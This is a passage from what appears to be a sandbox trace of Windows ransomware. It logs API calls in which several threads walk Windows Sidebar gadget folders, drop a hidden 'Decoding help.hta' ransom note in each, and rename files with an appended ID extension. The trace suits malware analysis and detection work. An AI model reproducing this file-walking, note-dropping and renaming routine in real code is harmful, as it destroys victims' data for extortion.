Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.529] lstrcmpiW (lpString1="Decoding help.hta", lpString2="item_hover_docked.png") returned -1 [0061.529] lstrlenW (lpString="item_hover_docked.png") returned 21 [0061.529] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.529] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.529] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="item_hover_docked.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" [0061.529] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" [0061.529] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.526] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e9e79e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84e9e79e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3ce9af45, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="item_hover_floating.png", cAlternateFileName="")) returned 1 Thread: id = 997 os_tid = 0x82c [0060.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2dfafd30 | out: lpFindFileData=0x2dfafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245589e8 [0060.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.289] FindNextFileW (in: hFindFile=0x245589e8, lpFindFileData=0x2dfafd30 | out: lpFindFileData=0x2dfafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.290] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.290] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.290] FindNextFileW (in: hFindFile=0x245589e8, lpFindFileData=0x2dfafd30 | out: lpFindFileData=0x2dfafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1aee4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.js", cAlternateFileName="")) returned 1 [0060.290] lstrcpyW (in: lpString1=0x251ffc20, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*" [0060.290] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*") returned 79 [0060.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\Decoding help.hta" [0060.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0061.530] WriteFile (in: hFile=0x698, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2dfafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2dfafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.531] CloseHandle (hObject=0x698) returned 1 [0061.531] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.531] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RSSFeeds.js") returned -1 [0061.531] lstrlenW (lpString="RSSFeeds.js") returned 11 [0061.531] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*" [0061.531] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*") returned 79 [0061.532] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\", lpString2="RSSFeeds.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js" [0061.532] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js" [0061.532] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js.[ID]g9uZrLhJaygpwRm1[ID]" [0061.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\rssfeeds.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\rssfeeds.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.526] FindNextFileW (in: hFindFile=0x245589e8, lpFindFileData=0x2dfafd30 | out: lpFindFileData=0x2dfafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x15a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.js", cAlternateFileName="")) returned 1 Thread: id = 998 os_tid = 0xe38 [0060.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2e0efd30 | out: lpFindFileData=0x2e0efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558a28 [0060.290] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.291] FindNextFileW (in: hFindFile=0x24558a28, lpFindFileData=0x2e0efd30 | out: lpFindFileData=0x2e0efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.291] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.291] FindNextFileW (in: hFindFile=0x24558a28, lpFindFileData=0x2e0efd30 | out: lpFindFileData=0x2e0efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x71c, dwReserved0=0x0, dwReserved1=0x0, cFileName="highDpiImageSwap.js", cAlternateFileName="")) returned 1 [0060.291] lstrcpyW (in: lpString1=0x25207c28, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*" [0060.291] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*") returned 78 [0060.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\Decoding help.hta" [0060.291] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0061.535] WriteFile (in: hFile=0x698, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e0efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e0efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.536] CloseHandle (hObject=0x698) returned 1 [0061.536] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.536] lstrcmpiW (lpString1="Decoding help.hta", lpString2="highDpiImageSwap.js") returned -1 [0061.536] lstrlenW (lpString="highDpiImageSwap.js") returned 19 [0061.536] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*" [0061.536] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*") returned 78 [0061.536] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\", lpString2="highDpiImageSwap.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js" [0061.536] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js" [0061.536] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js.[ID]g9uZrLhJaygpwRm1[ID]" [0061.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\highdpiimageswap.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\highdpiimageswap.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.527] FindNextFileW (in: hFindFile=0x24558a28, lpFindFileData=0x2e0efd30 | out: lpFindFileData=0x2e0efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xab00, dwReserved0=0x0, dwReserved1=0x0, cFileName="library.js", cAlternateFileName="")) returned 1 Thread: id = 999 os_tid = 0x5cc [0060.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*", lpFindFileData=0x2e22fd30 | out: lpFindFileData=0x2e22fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558a68 [0060.292] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.292] FindNextFileW (in: hFindFile=0x24558a68, lpFindFileData=0x2e22fd30 | out: lpFindFileData=0x2e22fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.292] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.292] FindNextFileW (in: hFindFile=0x24558a68, lpFindFileData=0x2e22fd30 | out: lpFindFileData=0x2e22fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.css", cAlternateFileName="")) returned 1 [0060.292] lstrcpyW (in: lpString1=0x9a930d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*" [0060.292] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*") returned 77 [0060.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\Decoding help.hta" [0060.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0060.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0061.533] WriteFile (in: hFile=0x698, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e22fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e22fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.534] CloseHandle (hObject=0x698) returned 1 [0061.534] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.534] lstrcmpiW (lpString1="Decoding help.hta", lpString2="clock.css") returned 1 [0061.534] lstrlenW (lpString="clock.css") returned 9 [0061.534] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*" [0061.534] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*") returned 77 [0061.534] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\", lpString2="clock.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css" [0061.534] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css" [0061.534] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\clock.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\clock.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.526] FindNextFileW (in: hFindFile=0x24558a68, lpFindFileData=0x2e22fd30 | out: lpFindFileData=0x2e22fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 Thread: id = 1000 os_tid = 0xc9c [0060.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2e36fd30 | out: lpFindFileData=0x2e36fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558aa8 [0060.294] 